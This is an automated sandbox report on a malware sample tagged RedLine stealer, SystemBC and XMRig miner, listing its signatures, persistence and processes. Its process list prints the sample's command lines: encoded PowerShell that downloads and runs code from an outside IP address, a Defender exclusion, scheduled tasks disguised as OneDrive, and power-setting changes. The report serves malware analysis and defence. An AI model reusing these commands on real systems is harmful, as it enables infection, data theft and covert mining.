Malware Analysis Report

2025-04-03 09:38

Sample ID 230507-bna96sab2x
Target 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d
SHA256 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d
Tags
redline systembc xmrig infostealer miner persistence stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d

Threat Level: Known bad

The file 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d was found to be: Known bad.

Malicious Activity Summary

redline systembc xmrig infostealer miner persistence stealer trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

xmrig

RedLine

SystemBC

Detects Redline Stealer samples

XMRig Miner payload

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-07 01:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-07 01:16

Reported

2023-05-07 05:49

Platform

win7-20230220-en

Max time kernel

112s

Max time network

157s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2004 set thread context of 1192 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 2004 set thread context of 2040 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 748 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 1720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1636 wrote to memory of 1720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1636 wrote to memory of 1720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1108 wrote to memory of 860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 1804 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 1804 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 1804 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 1696 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 1696 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 1696 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 948 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 948 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1108 wrote to memory of 948 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1340 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1340 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1340 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1636 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1636 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1636 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1636 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1000 wrote to memory of 2004 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1000 wrote to memory of 2004 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1000 wrote to memory of 2004 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1636 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1636 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1636 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1636 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1052 wrote to memory of 1472 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1472 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1472 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1680 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1680 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1680 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1240 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1240 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1240 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1736 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1736 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1052 wrote to memory of 1736 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1476 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2004 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 2004 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1444 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1444 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1444 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1444 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1444 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1444 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe

"C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\system32\taskeng.exe

taskeng.exe {C34B5D7C-A13F-4347-A951-70B6E3C0CB74} S-1-5-21-1563773381-2037468142-1146002597-1000:YBHADZIG\Admin:Interactive:[1]

